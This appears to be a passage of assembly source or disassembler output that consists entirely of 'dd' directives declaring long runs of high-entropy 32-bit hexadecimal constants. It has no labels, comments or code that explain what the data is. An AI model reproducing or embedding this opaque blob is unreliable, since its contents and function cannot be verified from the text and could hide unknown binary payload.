		dd 39FE16B5h, 0F9577471h, 0BCBEFAAEh, 6DB32B48h, 0C26219C4h
		dd 78A193ECh, 0CE1D783Ch, 2626A29Dh, 20198286h,	0A3CA338Ah
		dd 0CADE1F82h, 86846FF3h, 861FB4F6h, 37549B52h,	0EAF09A96h
		dd 0B3FC225Eh, 82F630C7h, 31131E5Bh, 21CA43CAh,	397D1B0Ah
		dd 0EB9D62A8h, 82E969C0h, 0C12F993Ah, 0E24FF751h, 0F06A0FB2h
		dd 8264614Ah, 8A2B00ADh, 0CABF95AAh, 5866165Eh,	981D12A5h
		dd 8D5A7FD4h, 9C10A281h, 0FC27B92Ch, 0F98CBDFEh, 76D45812h
		dd 0D1A44FD6h, 4E92E782h, 2F39A770h, 0C7169CE8h, 8B5F4BEAh
		dd 0C84612B7h, 0B9B6E316h, 25A2D47Fh, 0D11FA036h, 0FD586BD2h
		dd 0FA25D672h, 20871310h, 0A1B2CAA6h, 94594092h, 0D0F4E34Eh
		dd 0E50DB3EBh, 5C311694h, 102843DDh, 0A96452FDh, 2B42CD36h
		dd 0CF483A40h, 94EDEF2Dh, 542D7A8Eh, 0FE46EAF4h, 318181Ch
		dd 0E5AA8758h, 0E3FDE5F4h, 0B81E318Eh, 83EFAF8h, 8DE41784h
		dd 383D844h, 0FD7D94Ch,	127FE085h, 0E30849B5h, 42E43E87h
		dd 0D6CCD91Dh, 551AFE6Ah, 6AB3EDDDh, 46914149h,	7DF3931Ch
		dd 5646A9D6h, 33D7FAFCh, 0B1BA67F2h, 0DC17A67Bh, 2EB9D4AFh
		dd 0B7D2528Dh, 0F121DE19h, 47C83AC2h, 862AF8ECh, 658C0814h
		dd 2F21D9CBh, 0CBFABF87h, 5989BDD4h, 0DD36A5BBh, 0C9549075h
		dd 6580B9F0h, 5F7E76DEh, 88C34F5Ah, 787E0404h, 0B3ABDEECh
		dd 5CF88565h, 0CE8AA0A1h, 970FAB6Ch, 76E1B713h,	0F92BC5D0h
		dd 43B1706h, 0EFA0E730h, 419489E4h, 0FFAA03B3h,	12E6C276h
		dd 29286D34h, 23930833h
		dd 0FDF514C8h, 0F03B110h, 0B358F78Bh, 1D0529B7h, 5F533FABh
		dd 794F459h, 81A2A160h,	0DD31E52h, 2B24B0C1h, 0F115C7BDh
		dd 3D629B4Eh, 2721D301h, 0B15205FEh, 58195184h,	822AAB54h
		dd 9B77523h, 0C6B8B7A0h, 28B48871h, 0A26F3296h,	519DA8BFh
		dd 0E19256E6h, 9EF845E4h, 0B5153768h, 0DE29F64Ah, 0FC9D073Eh
		dd 1FA356C5h, 0FF20391Ah, 0BE0ACCCEh, 5E7C4365h, 0F90B840Dh
		dd 568F17F1h, 35B0552Ah, 0BC9185D6h, 0E6BDC0F2h, 5695EEE2h
		dd 0CD155CF1h, 0BC318A2Ch, 1CFCF255h, 3C104AD8h, 22E36A4Bh
		dd 607F7DC4h, 0DFAFAAF3h, 0DA9D39FCh, 6E772095h, 0ADD70FC3h
		dd 6C284BFCh, 0D39DEF1Fh, 2E65A050h, 7710A47h, 0B08ED37Fh
		dd 4BA0547Ch, 0D08D8D88h, 14BBF931h, 6F5EFA88h,	7B1DF691h
		dd 6EA32F9Ah, 782416F7h, 0A6216516h, 0D0197CADh, 6FF7CA2Bh
		dd 876E1744h, 5B215514h, 19C8175Ah, 256E7225h, 0AC905164h
		dd 3F3BB045h, 0C7BCD670h, 0B47769FCh, 0E885BFACh, 2F85B76Ch
		dd 31125773h, 0BC79FD2Ch, 594D50A8h, 97F33ECAh,	63FFD041h
		dd 1A4B44B4h, 0E7706FF2h, 7D68B44Fh, 53CED2D6h,	89866A23h
		dd 0E1A0549h, 466C07EDh, 45FE8B20h, 52201109h, 0AE2DAD96h
		dd 9329727Bh, 9DBE5D37h, 20A07859h, 566897E1h, 0A4F35916h
		dd 5F4BC4C5h, 301829FAh, 33A5151Fh, 3E903C73h, 2E24F6D1h
		dd 0D53AF966h, 0B1B43236h, 8E30127Fh, 39235735h, 2ED9257Bh
		dd 230358A1h, 7EFCB85Fh, 1C68CECDh, 89016A73h, 650D550Ah
		dd 0C40A5414h, 0C5D34C5Fh, 0DDAD713Eh, 12F212D4h, 4E2A159Dh
		dd 71494A2Ch, 775EF14Ah, 0AC773B53h, 948EB568h,	555E81B8h
		dd 14C02C08h, 0AF9B9AADh, 9E895BE0h, 5EE60629h,	0BF997F88h
		dd 7CF0E291h, 616AD7D1h, 742C225Ch, 779FF377h, 0FDC56BE9h
		dd 1D8FE372h, 46988295h, 548D828Fh, 85FDA061h, 8D945FB6h
		dd 7755C199h, 35390184h, 54611EA5h, 70F0A5BAh, 7E23CD11h
		dd 147AFF08h, 0F95A6567h, 5A848CCDh, 0BB50B34Fh, 0F0175060h
		dd 61CD099h, 7A85D108h,	0BDAFB78Dh, 0C57C4039h,	26CD6415h
		dd 351A27C8h, 2AAB5035h, 0BB8ABB41h, 0A4876E35h, 0DBA6D0C9h
		dd 29D080AEh, 79151019h, 0C24D8C60h, 48F31E14h,	91DF5DB4h
		dd 6FFEB2BEh, 0AF0594ABh, 0FBF3F183h, 0B9D9E4F3h, 674A7409h
		dd 0ED062788h, 85037B0Fh, 0BAB75BAFh, 0A26174EAh, 5B98D1C7h
		dd 0C0B07212h, 3C7C047Fh, 151C1373h, 0D7E70FDFh, 0F634C742h
		dd 0D753F377h, 813AE808h, 0B74B465Bh, 9BCEF7D6h, 206A44E6h
		dd 0E0E0ACD6h, 6AA39A4Dh, 5DC76872h, 0C9580D45h, 7428A2DBh
		dd 5855AA95h, 78277355h, 696EB0BDh, 83CC5450h, 2AB0A325h
		dd 0C181B6B1h, 542F4FF1h, 13B969BFh, 66BEAB11h,	0ACB5A517h
		dd 61900337h, 4BB35ED1h, 3D364BA1h, 0F7E3906Eh,	5D88D717h
		dd 5503F673h, 9721E6E4h, 6B354FACh, 9DA2D058h, 0CAD9D06Ah
		dd 0A5FEF330h, 9BC42FE1h, 0D411F571h, 39469456h, 55F168BDh
		dd 7D191395h, 0F73E1A6h, 0A0B5DFA8h, 0D712F0A1h, 3DAE77E6h
		dd 9E4FE82h, 0A25A2F25h, 1D87E6D3h, 0F15F29ABh,	0B93B90D3h
		dd 8AE2DC52h, 3C405CF8h, 168D7A0Eh, 0ACBAE950h,	0F6925B2h
		dd 3F0538DEh, 0C057FE0Ch, 64927CE5h, 22333860h,	0CE1B85C1h
		dd 1877D526h, 856FF521h, 6F8A65E6h, 7CD59539h, 5C22BD73h
		dd 0B22DBAEDh, 0BB3AD110h, 0AF383E90h, 3718AA18h, 9D71ED64h
		dd 0F51DAC1Dh, 275EEA94h, 0C09CC5EBh, 648546B9h, 0C4605A5h
		dd 1DDBB3BDh, 77ECA75Ah, 0EAEB8A84h, 0ACE5D238h, 9B2F3127h
		dd 504B133Dh, 0E711F3D0h, 2C58DF01h, 7D08D37Fh,	47940562h
		dd 0DB4D7E07h, 0F57451AAh, 0F0393C75h, 0A56FE13Fh, 5C2F76C1h
		dd 0B9D3964Ch, 398F1D47h, 1380AD57h, 0A920A7BAh, 7D1C3119h
		dd 1176A711h, 31226F9Eh, 299F9633h, 31EE3524h, 6C8612A0h
		dd 0DA2B8462h, 7627DBB8h, 8C2EDAECh, 5DBF5855h,	88D5CD65h
		dd 0D967EE6Bh, 8A6903F6h, 0E7453B42h, 54ADAD6Eh, 5F0897D6h
		dd 0E17F1983h, 0A88572F5h, 28D488E3h, 5FD5F856h, 9ABFF386h
		dd 9CBBFCF4h, 4E1CF5FCh, 0C061CE47h, 0B0F5307Ch, 652151A4h
		dd 0C0611105h, 9BACFC70h, 0C6DF9F5Dh, 6AB2F864h, 2FA8F31h
		dd 77381BAAh, 0BC529E75h, 0FBF4F9D7h, 4BEB2FC6h, 46FB3383h
		dd 724BD504h, 62BAAA88h, 81C4AD77h, 70560312h, 0F320C997h
		dd 87E3BEDAh, 1813537h,	6E323B5h, 0C9625DEDh, 90D2610Ah
		dd 635D8AF9h, 6D2162AEh, 40CBB7F8h, 7BB6C399h, 5BE4A13Bh
		dd 36E4DB4Ah, 77D9E1F6h, 32F7F0E7h, 99A598B6h, 39254B0Dh
		dd 64DCD5Bh, 91105C2Eh,	342B4483h, 9B4FEE5Dh, 0B2191B9Fh
		dd 0E1ECB396h, 0CA951FF8h, 0D59961A3h, 0E7525A22h, 0ECD23165h
		dd 0E1BE713Ch, 0CD978BFFh, 8A2313CBh, 0FDCB3AE3h, 492088A2h
		dd 0ECB814FBh, 29DCE33Bh, 0B74AAAD3h, 0E56D81EAh, 8DCBF778h
		dd 85F6E638h, 79C4CA2Ah, 1295FB77h, 0D3A93DA3h,	5CCBD680h
		dd 9EE9FE98h, 8276FCA5h, 0F1F0453Fh, 512C1AA3h,	0BF02B640h
		dd 0BEF17BAFh, 0F5726DD4h, 351A00B6h, 81FEAB5Ah, 7C2B2DADh
		dd 0BF1B6326h, 8266A7ECh, 4FEF01D8h, 0BB1CDEE5h, 0ABABE7B8h
		dd 6FBA430h, 0AB107034h, 1BE69FF7h, 34EAE5B1h, 0D909BF21h
		dd 0B4B5CA0h, 0E4ADBF34h, 3AE06BAAh, 65A09DF7h,	57686231h
		dd 7E1D46AEh, 0E4F0A97Fh, 0CA646778h, 98BBA0BEh, 0EF8FFFA4h
		dd 5101ADAh, 0D564079Fh, 0CD421CE7h, 0B242321Bh, 7A6BD117h
		dd 8B9027CDh, 63CAE999h, 0E754F8EDh, 9E094E97h,	3C13D76Ch
		dd 42E70AF7h, 0E1DA2765h, 29570FC4h, 0CA7F2A73h, 3BD0E944h
		dd 0CD061098h, 556155h,	3D0ECFDh, 0A9324E73h, 0A4BA937Ch
		dd 0ECAFA330h, 0E360FA4Ch, 3F8EBD33h, 99C4A99h,	85BB8D02h
		dd 0A980C7DFh, 0F62997D5h, 4A9F5B7Ch, 1F81BE9Fh, 0BD6007CDh
		dd 0A131BAF7h, 7567DB78h, 2489ECCCh, 3A2F1257h,	195E794h
		dd 9EC7D27Ch, 0A048D099h, 0F8F3BF15h, 0AA44EAC7h, 597C42FEh
		dd 4D7DC3DFh, 0FFEF2F8Dh, 0AFFF1F2Bh, 3B59F167h, 0B3E73A2h
		dd 0F09E69F3h, 522EE4B9h, 59A57D6h, 0AEFAB335h,	4277EF16h
		dd 5DFC0638h, 12488F35h, 0DEF42B73h, 0DCAEF037h, 896C0BF3h
		dd 74E35116h, 6FB9E5CDh, 783270A7h, 0CD0A0061h,	8AA6F752h
		dd 0E93C5024h, 278A3933h, 0EDF80164h, 7EFD174Ah, 47B4C07Dh
		dd 0D8E90C07h, 673035F0h, 0C4A3CC5Ch, 6CE1B8C8h, 0CE5186DBh
		dd 1F07EAA8h, 17185EEBh, 250BC108h, 68BE7EDAh, 0E764E162h
		dd 867D40D9h, 0C64FDDCDh, 59DB4F0h, 57142D4Eh, 0E35B16D1h
		dd 6FADD4DBh, 6A541D26h, 0B9DE071h, 435712FFh, 0A00AB24Bh
		dd 304AEDD2h, 1C35B16Eh, 0A738F763h, 0F08D914Bh, 0BE5B6C1Bh
		dd 0C45F6078h, 0E1F78642h, 7EB8CD61h, 2D682FD8h, 958B449Eh
		dd 0BEABD17Ah, 0FB72135Dh, 46429C8Ah, 0F4E7D115h, 39640BFDh
		dd 254BFCBAh, 0B47AF6A7h, 15FDEB79h, 786DFD81h,	7316F6F1h
		dd 3BC6507Ch, 137DA741h, 0EFDB6564h, 5D27A146h,	2D17B170h
		dd 0F0024822h, 0EAA28DEAh, 0DF3B77E9h, 60CCA534h, 874D1AF7h
		dd 0CE550513h, 6BBEC591h, 0F8C7AD17h, 8A9163D8h, 0FDF05CE4h
		dd 0A824892Ah, 0B92E780Eh, 0D17D70F8h, 0B3E06546h, 0F744DB68h
		dd 8BCFA3A0h, 0EA66F8C1h, 0B950BD36h, 412D80BAh, 2E6344D4h
		dd 5D1D1F4Dh, 0FF6CF8EAh, 0B2F51E14h, 0A7FDB209h, 298E6286h
		dd 5AC73A8Eh, 71279A2Ch, 2D13870Ah, 68349BE7h, 3693A913h
		dd 0D6FC0EEEh, 469BEBEh
		dd 0FE5FAED0h, 695662A3h, 0D1318C6Fh, 2DC5AAB7h, 6CDE816Ch
		dd 916FDDFh, 7D5C6A76h,	983A0ED5h, 0D05AA4B7h, 0D8858BB8h
		dd 3E1C2F90h, 93C6585Ch, 5265CB14h, 0DB2E311Ah,	0F3C1AE20h
		dd 0A02958C4h, 0D7C7217Fh, 0AB41F740h, 8F1C4224h, 20C88E5Fh
		dd 6392562Ch, 80BFD957h, 157DE188h, 1BF98569h, 1F00A668h
		dd 22C81763h, 1B88502Eh, 552C7711h, 7DBB2EB4h, 7C93BCE0h
		dd 0E2125D55h, 0D0BFD1F6h, 186A4576h, 896EBF68h, 0B98CC5F9h
		dd 26B235ABh, 42AF2AC2h, 0AA086344h, 0A4B18BFDh, 0D8B8B583h
		dd 18B191CEh, 320A449Ah, 5EA3CC6Fh, 707BA25Bh, 4123A02Bh
		dd 0C2A312B9h, 2D9465CDh, 6B2093D0h, 0FE91DAD4h, 8937A2B7h
		dd 0A3D7F59Ah, 0C1C3B8F4h, 0EC5FF015h, 0B6DC1772h, 7A156146h
		dd 6C4A55D0h, 0A6F84F6Dh, 42948940h, 0ED1C7958h, 97CDC570h
		dd 9B997EBAh, 0BBBA40BFh, 0BF3CFE1h, 0A45DC42Eh, 9F9D55C5h
		dd 4BED83EAh, 3A48A3ACh, 26CAA290h, 0DB780AF0h,	43DBD4B7h
		dd 16C04513h, 317A77CFh, 0BF8BFCACh, 0F2ABDDE8h, 3A4665E6h
		dd 68E381B5h, 6E7FF14Dh, 88607645h, 0DF066C12h,	34C774E0h
		dd 6AA6DBDh, 0D3B21208h, 0AEE65980h, 717B8900h,	3C924CA6h
		dd 6F40ECEFh, 0A90EB77Eh, 151BAC8Eh, 4B5F4BE1h,	9FCFC3EFh
		dd 0D57B338Eh, 6B8D4EB4h, 0C967452Eh, 0D0C4A53Eh, 0A7D9D6F5h
		dd 615E824Dh, 0FC090FC5h, 9EFC983Eh, 7535F73Bh,	26556158h
		dd 601205D2h, 375CCAA1h, 97CF8B1Fh, 225B43CDh, 0B7EEC37Eh
		dd 0C4511BB1h, 942C65FBh, 50293344h, 303CA19Ah,	0CBE9D7DBh
		dd 66B0E64h, 1FFFD45Eh,	9259FC0h, 0C471DE2Eh, 2316CF28h
		dd 36F2DC59h, 826E6746h, 0E62ED1D4h, 7BD47DD4h,	230DE590h
		dd 0BC73E099h, 61A45B3Eh, 0A63E717Ch, 7F04F868h, 0ABAE6F79h
		dd 0FD3BE4Bh, 0EC377078h, 0B03EF5C3h, 3D5C10BEh, 5FE6770h
		dd 0F7693DB2h, 2B053C63h, 0BFA7553Ah, 0A097C862h, 44B49DE4h
		dd 143036C7h, 4B165437h, 527642F9h, 2934F25h, 0C8FBCBBAh
		dd 25994CD6h, 2AED9C4h,	0F88AFD8Eh, 3BC62530h, 0D2980EBh
		dd 463BBC58h, 0B446A457h, 398AE964h, 8EFDA1BAh,	216FD7A5h
		dd 0EFAA6C96h, 0EBE58DD9h, 2EAA2898h, 0E3B6C5F4h, 3A317227h
		dd 0DFB19F5Ch, 0EA9FD7DEh, 0A8BF3089h, 0F8C08DABh, 1CF3A575h
		dd 7DE03481h, 481A21FFh, 0B90CEAB2h, 903C618Eh,	1D6B68FDh
		dd 868E717Eh, 705EA963h, 0C30E4AB9h, 58743FB4h,	0DB643D15h
		dd 61523E50h, 0DDBE0825h, 3120F378h, 0DFF86438h, 0DB356BFEh
		dd 0E23BD780h, 5450EF87h, 552833C0h, 3959C4C8h,	260BA8D4h
		dd 0FBF0144Dh, 0FE4A17EBh, 3BF3A8FCh, 87A5DAD6h, 0B84A33E1h
		dd 78731157h, 0F1BAE80Eh, 0D595A834h, 0BB0EBF57h, 0D76F68FFh
		dd 9FA3FB5Bh, 2C6B0607h, 0D912DF5Dh, 0E0B812DAh, 0DC39502Eh
		dd 7D13DEF8h, 71435FC1h, 70B37316h, 1A5B3D1h, 4A1EC9BBh
		dd 0E6BB96B5h, 0B4146C15h, 0FC95F79Bh, 3E5FBCB9h, 0F5D946C3h
		dd 72E03E91h, 0B0FCDE25h, 5FAAF1E3h, 0F071559h,	0F3704514h
		dd 0CCD4C227h, 6D354EECh, 502F6514h, 44141C00h,	746D86B6h
		dd 9B2FF069h, 5E63A1C3h, 0FEA16639h, 0BFC0AAF6h, 3CCF62B8h
		dd 9C862CEAh, 2382F5Ch,	49B66565h, 0D5831C34h, 74FF360Bh
		dd 65272F79h, 92FF1EA4h, 1AE3A215h, 0DDBB1796h,	26D5304Ah
		dd 0FC4B87E0h, 5CC3122Bh, 2F3C808Bh, 0A18B0FC5h, 1F1A84AFh
		dd 2AC1A6FFh, 89A76D60h, 9477BAB6h, 4AD06FFDh, 0EB342059h
		dd 210AE6A3h, 0DCEBFBF0h, 6B2EEDDCh, 5DAEE084h,	0BA966BF6h
		dd 37C6C821h, 68EA50F6h, 0E138EE1Ah, 0BE59D314h, 5C8D7A12h
		dd 31DC1AE8h, 4B8F4A68h, 7F74E7CAh, 929FC5B4h, 31E0FF0Ch
		dd 0E49ED463h, 0EE01C602h, 0DD54AF3Dh, 0E537851Bh, 0FB02A20Ah
		dd 0B93511D2h, 0EAA645A0h, 0DCCB1592h, 0C99A89C2h, 67F56F7Eh
		dd 756EE1A5h, 74AD1DB8h, 0C5DDDCA5h, 5A5F69DFh,	7CABE2Dh
		dd 66C769FFh, 5DAFF2F5h, 82DEBF86h, 47C0D329h, 0D4A02EF7h
		dd 0E42109CFh, 0B8D61CC9h, 36958BADh, 9DC45FEBh, 0F226A004h
		dd 0C28915F0h, 5EC5F7D1h, 32E90D25h, 0CC226D90h, 9C4B965Dh
		dd 0ED2AF511h, 0FE1F555Bh, 5C935689h, 4C4927C9h, 8D7D38B7h
		dd 2C256098h, 0EE205FD3h, 86013EC5h, 2D7F2DFh, 945A79F9h
		dd 0AB83D250h, 412B8F10h, 11602E82h, 0FE6E9ABDh, 5F8D79D4h
		dd 0D565B70Ah, 278051A0h, 54940A48h, 1B1B970Dh,	341E4F42h
		dd 0BDCE0398h, 0DD41D1A5h, 7809626Eh, 67C13AE1h, 82EC5FC6h
		dd 0D9C40BDFh, 6FB6E6ACh, 8BF719A5h, 5A59BA1Fh,	3C37EB1Dh
		dd 3E7FB03Ch, 65317B31h, 0DAFD9A9Bh, 0BFE05586h, 0A619F0C4h
		dd 5D65672Ah, 425D01B4h, 1FCE6BE4h, 7A823F98h, 7DFBA660h
		dd 0BB7C25B4h, 0CF15752h, 0E73EEAD1h, 2EFBD7FAh, 9FAAF6EFh
		dd 7580465Fh, 9149D455h, 0B80A617Bh, 52706EEAh,	0EECE47B9h
		dd 0B17DCDF3h, 0E15B79AFh, 50FC0D65h, 11164987h, 0B34FC64h
		dd 0B4051523h, 4C59184Ah, 2AFC17h, 5DEC1847h, 0DFC27C73h
		dd 0BB204711h, 0AEC003A9h, 0FD175016h, 0E1D35125h, 0BAB4BA1Bh
		dd 0FAAAB418h, 0A4112372h, 0D041A7F9h, 246A7E09h, 8926D56Ch
		dd 0B313121Dh, 0DE745CC6h, 2B6B3703h, 0D111355Ch, 3F1A4E5Eh
		dd 1609D86h, 5B8BAAB9h,	857B6F03h, 0FCBBF538h, 96825222h
		dd 73FF4962h, 3E7D796Dh, 68187E86h, 0ABDE3DC3h,	0AD9489FDh
		dd 60A7BAD6h, 0BD1DD1E3h, 4FE9F14Ah, 25F0C568h,	0C21489D5h
		dd 989B9EBCh, 8034801Bh, 764152D4h, 721F330Ch, 1469FFAEh
		dd 71578F86h, 0AD4676B3h, 0D164536Ch, 8EEA389Dh, 13C1E547h
		dd 0FF7ADC2h, 5DC0BB89h, 0BED9D787h, 0D0F55A15h, 712F7078h
		dd 89A1058Ah, 0E8F8592Eh, 8DFC10B8h, 0F1735AA0h, 76694530h
		dd 0D61DEB2h, 0D6B82F84h, 0E73B1155h, 0D8894E1Bh, 4A2C5A28h
		dd 66706DD1h, 8B5686C8h, 902D55ABh, 0B9376381h,	5B2F5795h
		dd 0DEE66722h, 84D63E2Dh, 2B50A84Ah, 45504DE0h,	981E21DAh
		dd 8399FD38h, 78EAFFA3h, 6ECF8350h, 0CEFCF8E4h,	24ABEA3Ch
		dd 0F8899201h, 3ED09BC5h, 5B35FBFFh, 22366EDBh,	5CCFCE82h
		dd 0EE3E584Ah, 9399A00Ah, 46FB6A50h, 0DF9FE834h, 3A44C23Bh
		dd 32BD8C41h, 958612D1h, 4294F4F3h, 39B3811Dh, 0FE59F05Eh
		dd 69B2BC40h, 63706E76h, 62CBB4C2h, 2C6EAF9h, 8AF3ED90h
		dd 27209603h, 0B63188ADh, 1ADE7A8h, 0C12F74A0h,	452C4359h
		dd 0FD763ACAh, 26C18AECh, 8E8549EEh, 0ED56A33Ch, 0CF956692h
		dd 6EF6A28Bh, 5005DCF4h, 960F3F3Bh, 0FE1608D4h,	386EF28Dh
		dd 5937D9BAh, 93F31BEFh, 0CF22925Dh, 4B19663Dh,	5A3AC372h
		dd 42BFC8ABh, 3BEA3B0Ah, 60655D02h, 67B2942Ch, 960AAC2Bh
		dd 0D00EA826h, 2B9351C9h, 501DDAEh, 6F4017B3h, 27244C7h
		dd 8A4CB329h, 0CEF2F139h, 6AB29E8Bh, 0E9D44D84h, 48430BF7h
		dd 123F6D1Dh, 0F81FA67Ah, 576C8982h, 0A9333A51h, 0E505A714h
		dd 0D5308AB6h, 0F49BEC5Fh, 0CD4C1AB6h, 357866B5h, 434368B1h
		dd 280C9886h, 83566241h, 0D049035Ch, 29C38F94h,	0F981942Eh
		dd 0B05052B5h, 0E2E9F7D8h, 2A2253ABh, 65549AEAh, 49FEA15Ch
		dd 4267CA95h, 15AB0D6h,	3D0F579h, 0FA7AFFB7h, 0A7D8F7C3h
		dd 30B4F581h, 0A224D079h, 5AA94AA1h, 0CB4E4B83h, 66149CC9h
		dd 0D665EC55h, 0A6F60A52h, 31DB2DCBh, 0A32D8665h, 0E395A114h
		dd 676C6A9Ch, 0C53B25A2h, 0EF865559h, 7FA9DBEBh, 0ADA6A92Dh
		dd 40404E1Ah, 0A7D79C7Ch
		dd 6F80DA27h, 36AC9C93h, 0C17E879Fh, 0FF3CF817h, 0FE103D14h
		dd 2F2FB3B0h, 92C0EE7h,	8B8485FBh, 307B760Dh, 0D18EE0FCh
		dd 68B545ABh, 6E46F3CBh, 7EE2652Ch, 56EC1E99h, 1BD32A5Eh
		dd 0C6E3B36Eh, 1E3FA800h, 0E07C8086h, 0BC1133E5h, 413D520Eh
		dd 5B47CC0Bh, 0AF56ADB8h, 0DF591C95h, 0F5751015h, 78F0F42Fh
		dd 53ED8A55h, 0C3E38A81h, 0FBBEFE9Ch, 0DF8699FDh, 7A378855h
		dd 0F3833113h, 514BB1C7h, 3D5A66C1h, 0C3DF2B6h,	7C4D1438h
		dd 8A35799Ah, 0F28C0BACh, 79E01F2Fh, 7C6553BAh,	156FCDAEh
		dd 0CD6E6B9Dh, 0D9487519h, 7D1B3E4Fh, 498AE38Dh, 34119253h
		dd 9477AF80h, 3F7B5541h, 0DDC00FC3h, 46FFFF9Fh,	1C1F5FC3h
		dd 0A71E47ADh, 0B35E5464h, 0CB7B1205h, 92C8B072h, 0BEB54D44h
		dd 3E51FA57h, 5103A3D5h, 0CF03ADAEh, 307574FAh,	38173CF8h
		dd 802F0F0h, 1683078Dh,	0BE344B6Ch, 49EEA395h, 0F2AAD719h
		dd 1F8B7C12h, 44ADCAE7h, 6A1043A8h, 32C107FBh, 6B0131ABh
		dd 70DD0636h, 7D2644DDh, 8EDAF22Ch, 7F718C77h, 8984B2DBh
		dd 46C62E86h, 7F2E354Fh, 30FBD0A1h, 0CC5C0F3Ah,	0CB041CDAh
		dd 9D551B0Fh, 0F89DB1Eh, 3B22378Eh, 0F970A112h,	2DCBB46Bh
		dd 0BEAC4A6Ch, 627C4B61h, 6A45BEA7h, 2DCC17E2h,	0EDA31DA8h
		dd 0DF559CA9h, 13BF85A7h, 6EA62B38h, 0AF8E1DD6h, 15A25F83h
		dd 3A40D09Ch, 0B2656EF8h, 4BE3EFE6h, 5E2EE7BFh,	6AF14335h
		dd 1DB739Dh, 0AC72E6EFh, 0BAC8E1AAh, 630240A5h,	0E4C1656Dh
		dd 0C8DED764h, 22FE8BFAh, 0F3C13793h, 5E3D3ECFh, 0C3AB800Ah
		dd 0E916D2B5h, 0E299AAADh, 95577738h, 0D4F7EE0Fh, 2D7E396Ch
		dd 0C4AA7557h, 0EABB93AAh, 3CBF7D71h, 0FAC21610h, 3BFABE04h
		dd 0F5904C1Dh, 8DC0B607h, 0FFE9CC4Eh, 3A4A6FFEh, 6929157Ch
		dd 56DE95A3h, 0B9F93BF0h, 2756214Fh, 6EC74411h,	5C14EC0Fh
		dd 7E345EFCh, 0CC17AD47h, 0CB99FB0h, 0CFC6B2ECh, 84CFFFB2h
		dd 0EF28AAEEh, 229DF713h, 0AB66984Bh, 2296B34Ah, 316C62FCh
		dd 0F76189D4h, 0AE1524A9h, 0A4DDF869h, 26D14496h, 8946147Ah
		dd 0BE068F0Ch, 0BDD4A36Fh, 2B0F4C3Ch, 307D36AAh, 6C71752h
		dd 892B12C3h, 4A6D93C7h, 0A228C4F7h, 0B2C24182h, 8580EE0Ch
		dd 4AA4EDA0h, 0EE22AEEBh, 97DC112Eh, 0EDA77F7Dh, 2DF0959h
		dd 61F3CF47h, 0A77BD505h, 0BA3CEF53h, 0F6994AF4h, 0B0C59365h
		dd 0A55AB95Ah, 0E4B712CEh, 0B908B47Ch, 9975EA02h, 4487576Ch
		dd 9C0A19CFh, 0F62DFF37h, 962A0F63h, 0B6E53B1Eh, 0BCAA8A66h
		dd 868B8D43h, 0B79BA251h, 6F86CF80h, 0CFE9C575h, 4D652325h
		dd 0D76F1EFDh, 3B3FC3EFh, 0EA9B5496h, 2ECDDFBEh, 87BDE411h
		dd 31DF0E1Fh, 0DA1EF286h, 675615A3h, 0AF07B291h, 0FBF4BA6Ch
		dd 8DF2951Fh, 1F08C786h, 70FF6AE2h, 0BA2BFDC8h,	0B73FAFC2h
		dd 0A96D5B0Ch, 4ACC6AA6h, 4DE7B7CDh, 0DD3D678h,	0A8D42957h
		dd 0ED1D99B1h, 8A102B2Eh, 0F79D6E23h, 0EF1C353Eh, 8C4BDFD5h
		dd 461547D6h, 0EE36AACFh, 457CD59Dh, 1109120Ah,	96A575ADh
		dd 67C0378h, 8901A12Ch,	6EB71A3Fh, 6E946D8Fh, 0EAF68D90h
		dd 3F27E2D7h, 4AFC8857h, 3C780279h, 759DD678h, 84D78C2Dh
		dd 8D26EB87h, 0EB643E83h, 20E412B9h, 612F3F05h,	24D13DE6h
		dd 85E7CEA9h, 39D85B32h, 740D070Bh, 0F0FC17E0h,	78C4CEF0h
		dd 0E2E21DFDh, 0BC62E0F0h, 878C5B71h, 905C60BDh, 471D521Bh
		dd 633A24EEh, 0EE2B42DAh, 5FF72B25h, 1FDF7ABh, 98DBCBA1h
		dd 9566BF29h, 3DEE88A2h, 671AAA99h, 0F53C2AA9h,	7C2B55EFh
		dd 0D14E19B5h, 321DCC1Fh, 56B063B3h, 253B7C67h,	0AA04FE55h
		dd 6B9C3165h, 0B9176DB3h, 3567C0F2h, 14C39ECCh,	0F7A2D22Dh
		dd 78F23A90h, 0D514FB1Bh, 4BEDCED5h, 6504AB44h,	95937155h
		dd 0B2D5049Ch, 0E6A303E3h, 586FF05Eh, 0CC4B232Dh, 398A2AA3h
		dd 4598A764h, 139CBE44h, 4E0D941Eh, 44D17CF8h, 359573F3h
		dd 0B8096260h, 74EC41B1h, 659DC535h, 0C10CA7D2h, 0F4778955h
		dd 0E0C95C69h, 0F4156160h, 0E341F350h, 0EDEC7178h, 0D70A2201h
		dd 2EE9CE2Bh, 974E3735h, 9DA36E27h, 95AB314Ah, 6FEAF977h
		dd 0CCA1D796h, 8123AFC4h, 2FA8D1C4h, 7126672Ah,	0C1E61E8Bh
		dd 0CFBE5A9Dh, 5A31C255h, 250DA8D6h, 3AB4A3DDh,	6DED309Ch
		dd 4251EAC3h, 0DA2FA1B4h, 687AB658h, 34B072A1h,	8BA9EC53h
		dd 71D37F2Fh, 7E472747h, 0B5D52D51h, 0D7F933C7h, 2C7E86EFh
		dd 657087E8h, 0C2954760h, 32713DBCh, 8CEDA6DCh,	2AA3D927h
		dd 76290685h, 0BED5EDF1h, 0AE7C2FF8h, 113A7A43h, 0E732634Ah
		dd 9DE368E9h, 0DC2B0059h, 86369144h, 0BBD82366h, 2D66DACCh
		dd 815AD846h, 0ABF73950h, 33452D79h, 0E79955Dh,	585CFC72h
		dd 89E4E60Fh, 88373B3Ah, 0C330F3D4h, 2AB398A6h,	3F413884h
		dd 960C3ED1h, 8A828C36h, 0C7812FB2h, 2555364Eh,	761FE4D3h
		dd 7A977B56h, 0C1D38DCCh, 3D0A4D24h, 0AFC501D3h, 795D0E3Bh
		dd 0F3F5F9Bh, 46AB2D0Eh, 0F5DE1353h, 0F0FA5A21h, 83EF05FDh
		dd 4D23364Bh, 6C45893Bh, 9FAE9920h, 6F263122h, 64B95790h
		dd 73AFA52Fh, 0E3B55562h, 0BCC51FF6h, 4EA5009Bh, 0F3E6A942h
		dd 96DF3655h, 8015E469h, 0D993B551h, 1C9EB9EDh,	0D8B42D1Bh
		dd 0CA917B2Eh, 68F52157h, 0FF925F4Eh, 66B1FF86h, 3944D2EAh
		dd 50EC2F9Eh, 0DB3A3203h, 0C431FA08h, 0DBA8BCA6h, 0D772B0A8h
		dd 1CD8B0D0h, 0D95A112Dh, 560B3D02h, 0C34D95C5h, 0BDC16F16h
